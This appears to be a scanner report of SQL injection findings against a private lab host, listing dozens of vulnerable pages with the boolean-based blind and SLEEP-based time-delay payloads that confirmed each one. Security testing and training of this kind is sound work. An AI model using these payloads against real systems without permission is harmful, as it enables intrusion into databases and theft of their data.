Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	4891=4891
	and	73529=73529
	or	27857=27857#
	and	99291=99292
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	4891=4891
	and	73529=73529
	or	27857=27857#
	and	99291=99292
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	4891=4891
	and	73529=73529
	or	27857=27857#
	and	99291=99292
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '/**/and/**/'95470'='95470
'/**/and/**/'50361'='50361
'/**/or/**/84274=84274#
'/**/and/**/'65218'='65219
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 
and
88585=88585

and
41735=41735

or
38024=38024#

and
38695=38696
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/xml/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'hacker'}
Payload: '+and+'88943'='88943
'+and+'37648'='37648
'+or+73643=73643#
'+and+'6517'='6518
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example100.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example102.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example101.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example104.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example106.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example105.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example103.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example107.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example108.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example109.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example110.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example111.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example112.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example113.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example114.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example115.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example116.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example117.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example119.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example118.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example120.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example122.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example121.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example123.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example124.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example125.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example127.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example126.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example128.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example129.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example131.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example130.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example132.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example133.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example134.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example136.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example135.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example137.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example138.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example139.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example140.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example141.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'55682'='55682
'	and	'70181'='70181
'	or	70036=70036#
'	and	'92483'='92484
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example9.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
Advice: use orm
Database: unknown
---